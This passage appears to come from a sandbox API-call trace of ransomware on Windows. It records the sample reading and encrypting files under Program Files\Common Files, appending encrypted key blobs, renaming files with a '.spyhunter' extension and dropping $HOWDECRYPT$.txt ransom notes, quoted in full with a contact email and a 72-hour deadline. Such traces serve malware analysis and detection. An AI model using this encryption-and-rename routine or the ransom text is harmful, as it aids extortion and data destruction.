files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 55 [0084.889] StrStrW (lpFirst="MSADDNDR.DLL", lpSrch=".txt") returned 0x0 [0084.889] GetProcessHeap () returned 0x2c0000 [0084.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x35f878 [0084.889] ReadFile (in: hFile=0xcc, lpBuffer=0x35f878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe94, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesRead=0x248fe94*=0x2800, lpOverlapped=0x0) returned 1 [0084.954] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.954] WriteFile (in: hFile=0xcc, lpBuffer=0x35f878*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe94, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesWritten=0x248fe94*=0x2800, lpOverlapped=0x0) returned 1 [0084.954] GetProcessHeap () returned 0x2c0000 [0084.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0084.954] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.955] WriteFile (in: hFile=0xcc, lpBuffer=0x248fed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe94, lpOverlapped=0x0 | out: lpBuffer=0x248fed4*, lpNumberOfBytesWritten=0x248fe94*=0x4, lpOverlapped=0x0) returned 1 [0085.349] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe94, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe94*=0x30, lpOverlapped=0x0) returned 1 [0085.350] CloseHandle (hObject=0xcc) returned 1 [0085.351] GetProcessHeap () returned 0x2c0000 [0085.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0085.351] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.spyhunter") returned 65 [0085.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.spyhunter" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.spyhunter")) returned 1 [0085.352] GetProcessHeap () returned 0x2c0000 [0085.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0085.352] GetProcessHeap () returned 0x2c0000 [0085.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0085.352] GetProcessHeap () returned 0x2c0000 [0085.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329dd8 | out: hHeap=0x2c0000) returned 1 [0085.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fed0 | out: pbBuffer=0x248fed0) returned 1 [0085.352] GetProcessHeap () returned 0x2c0000 [0085.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0085.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fec8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fec8*=0x30) returned 1 [0085.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0085.391] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 71 [0085.391] StrStrW (lpFirst="MTEXTRA.TTF", lpSrch=".txt") returned 0x0 [0085.391] GetProcessHeap () returned 0x2c0000 [0085.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x35f878 [0085.391] ReadFile (in: hFile=0xcc, lpBuffer=0x35f878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesRead=0x248fe8c*=0x1de8, lpOverlapped=0x0) returned 1 [0085.526] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffe218, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.526] WriteFile (in: hFile=0xcc, lpBuffer=0x35f878*, nNumberOfBytesToWrite=0x1de8, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x35f878*, lpNumberOfBytesWritten=0x248fe8c*=0x1de8, lpOverlapped=0x0) returned 1 [0085.526] GetProcessHeap () returned 0x2c0000 [0085.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0085.526] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.526] WriteFile (in: hFile=0xcc, lpBuffer=0x248fecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x248fecc*, lpNumberOfBytesWritten=0x248fe8c*=0x4, lpOverlapped=0x0) returned 1 [0085.526] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe8c*=0x30, lpOverlapped=0x0) returned 1 [0085.526] CloseHandle (hObject=0xcc) returned 1 [0085.527] GetProcessHeap () returned 0x2c0000 [0085.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0085.527] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.spyhunter") returned 81 [0085.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.spyhunter")) returned 1 [0085.625] GetProcessHeap () returned 0x2c0000 [0085.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0085.626] GetProcessHeap () returned 0x2c0000 [0085.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0085.626] GetProcessHeap () returned 0x2c0000 [0085.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3242d8 | out: hHeap=0x2c0000) returned 1 [0085.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fed0 | out: pbBuffer=0x248fed0) returned 1 [0085.626] GetProcessHeap () returned 0x2c0000 [0085.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0085.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fec8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fec8*=0x30) returned 1 [0085.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0085.767] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0085.767] StrStrW (lpFirst="offfiltx.dll", lpSrch=".txt") returned 0x0 [0085.767] GetProcessHeap () returned 0x2c0000 [0085.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x341830 [0085.767] ReadFile (in: hFile=0xb4, lpBuffer=0x341830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesRead=0x248fe8c*=0x2800, lpOverlapped=0x0) returned 1 [0086.052] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.052] WriteFile (in: hFile=0xb4, lpBuffer=0x341830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesWritten=0x248fe8c*=0x2800, lpOverlapped=0x0) returned 1 [0086.052] GetProcessHeap () returned 0x2c0000 [0086.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0086.052] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.053] WriteFile (in: hFile=0xb4, lpBuffer=0x248fecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x248fecc*, lpNumberOfBytesWritten=0x248fe8c*=0x4, lpOverlapped=0x0) returned 1 [0086.308] WriteFile (in: hFile=0xb4, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe8c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe8c*=0x30, lpOverlapped=0x0) returned 1 [0086.308] CloseHandle (hObject=0xb4) returned 1 [0086.701] GetProcessHeap () returned 0x2c0000 [0086.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x387090 [0086.702] wnsprintfW (in: pszDest=0x387090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.spyhunter") returned 81 [0086.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.spyhunter")) returned 1 [0086.702] GetProcessHeap () returned 0x2c0000 [0086.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x387090 | out: hHeap=0x2c0000) returned 1 [0086.702] GetProcessHeap () returned 0x2c0000 [0086.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.702] GetProcessHeap () returned 0x2c0000 [0086.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324560 | out: hHeap=0x2c0000) returned 1 [0086.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fec8 | out: pbBuffer=0x248fec8) returned 1 [0086.702] GetProcessHeap () returned 0x2c0000 [0086.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.703] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fec0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fec0*=0x30) returned 1 [0086.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.847] GetProcessHeap () returned 0x2c0000 [0086.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.847] GetProcessHeap () returned 0x2c0000 [0086.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372870 | out: hHeap=0x2c0000) returned 1 [0086.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fec8 | out: pbBuffer=0x248fec8) returned 1 [0086.848] GetProcessHeap () returned 0x2c0000 [0086.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fec0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fec0*=0x30) returned 1 [0086.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.871] GetProcessHeap () returned 0x2c0000 [0086.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.871] GetProcessHeap () returned 0x2c0000 [0086.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328af8 | out: hHeap=0x2c0000) returned 1 [0086.872] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fec0 | out: pbBuffer=0x248fec0) returned 1 [0086.872] GetProcessHeap () returned 0x2c0000 [0086.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248feb8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248feb8*=0x30) returned 1 [0086.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.872] GetProcessHeap () returned 0x2c0000 [0086.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.872] GetProcessHeap () returned 0x2c0000 [0086.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372870 | out: hHeap=0x2c0000) returned 1 [0086.872] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0086.873] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.873] WriteFile (in: hFile=0x164, lpBuffer=0x248fdf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ff1c, lpOverlapped=0x0 | out: lpBuffer=0x248fdf3*, lpNumberOfBytesWritten=0x248ff1c*=0x127, lpOverlapped=0x0) returned 1 [0086.874] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.874] WriteFile (in: hFile=0x164, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ff1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ff1c*=0x2ac, lpOverlapped=0x0) returned 1 [0086.874] CloseHandle (hObject=0x164) returned 1 [0086.874] GetProcessHeap () returned 0x2c0000 [0086.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383950 | out: hHeap=0x2c0000) returned 1 [0086.874] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248feb8 | out: pbBuffer=0x248feb8) returned 1 [0086.874] GetProcessHeap () returned 0x2c0000 [0086.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.874] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248feb0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248feb0*=0x30) returned 1 [0086.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.933] GetProcessHeap () returned 0x2c0000 [0086.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.933] GetProcessHeap () returned 0x2c0000 [0086.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383850 | out: hHeap=0x2c0000) returned 1 [0086.934] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.934] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.934] WriteFile (in: hFile=0x15c, lpBuffer=0x248fdeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ff14, lpOverlapped=0x0 | out: lpBuffer=0x248fdeb*, lpNumberOfBytesWritten=0x248ff14*=0x127, lpOverlapped=0x0) returned 1 [0086.935] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.935] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ff14, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ff14*=0x2ac, lpOverlapped=0x0) returned 1 [0086.935] CloseHandle (hObject=0x15c) returned 1 [0086.935] GetProcessHeap () returned 0x2c0000 [0086.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373438 | out: hHeap=0x2c0000) returned 1 [0086.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248feb0 | out: pbBuffer=0x248feb0) returned 1 [0086.935] GetProcessHeap () returned 0x2c0000 [0086.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.935] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fea8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fea8*=0x30) returned 1 [0086.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.945] GetProcessHeap () returned 0x2c0000 [0086.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.945] GetProcessHeap () returned 0x2c0000 [0086.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373350 | out: hHeap=0x2c0000) returned 1 [0086.946] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248feb0 | out: pbBuffer=0x248feb0) returned 1 [0086.946] GetProcessHeap () returned 0x2c0000 [0086.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.946] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fea8*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fea8*=0x30) returned 1 [0086.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x359310 | out: hHeap=0x2c0000) returned 1 [0086.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fea8 | out: pbBuffer=0x248fea8) returned 1 [0086.973] GetProcessHeap () returned 0x2c0000 [0086.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fea0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fea0*=0x30) returned 1 [0086.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.974] GetProcessHeap () returned 0x2c0000 [0086.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0086.974] GetProcessHeap () returned 0x2c0000 [0086.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x324488 | out: hHeap=0x2c0000) returned 1 [0086.974] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fea8 | out: pbBuffer=0x248fea8) returned 1 [0086.974] GetProcessHeap () returned 0x2c0000 [0086.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0086.974] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fea0*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fea0*=0x30) returned 1 [0086.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.044] GetProcessHeap () returned 0x2c0000 [0087.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0087.044] GetProcessHeap () returned 0x2c0000 [0087.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358f00 | out: hHeap=0x2c0000) returned 1 [0087.044] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fea0 | out: pbBuffer=0x248fea0) 